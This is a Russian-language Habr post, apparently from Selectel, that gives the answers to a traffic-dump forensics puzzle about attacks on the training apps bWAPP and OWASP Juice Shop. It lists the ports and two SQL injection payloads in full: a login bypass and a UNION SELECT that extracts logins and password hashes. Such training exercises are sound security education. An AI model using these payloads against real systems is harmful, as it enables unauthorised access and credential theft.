Ответ на задачу про следы взлома в дампе трафика
Привет, Хабр! Помните задачу о взломе, которую подготовил наш специалист по информационной безопасности? Как и обещали, показываем верные ответы.
Напомним, что в ней было:
На одном сервере находятся два уязвимых веб-приложения. В сети этого сервера размещен второй хост, с которого зафиксированы попытки эксплуатации уязвимостей веб-приложений.
Определите по дампу трафика:
на каких портах отвечают веб-приложения,
какая нагрузка в SQL-инъекции использована для обхода авторизации в первом приложении,
какая нагрузка в SQL-инъекции использована для получения логинов и хэшей паролей во втором приложении,
решение задач каких известных приложений отражено в дампе?
Файл dump.pcap
Верные ответы
↓
↓
↓
↓
На каких портах отвечают web-приложения?
80/TCP, 5000/TCP
Какая нагрузка в SQL-инъекции использована для обхода авторизации в первом web-приложении?
‘ or 1 — –
Какая нагрузка в SQL-инъекции использована для получения логинов и хэшей паролей во втором web-приложении
Man%27+union+select+1%2Cuser%28%29%2Cdatabase%28%29%2C%28select+GROUP_CONCAT%28login%2C+%27%5Cn%27%2C+password%2C+%27%5Cn%27%29+from+users%29%2C5%2C6%2C7+–+-
Решение задач каких известных приложений отражено в дампе?
bWAPP, OWASP JuiceShop
Интересно, как решить задачу? Показываем пошаговое решение в Академии Selectel.
Все посты подряд / Информационная безопасность / Хабр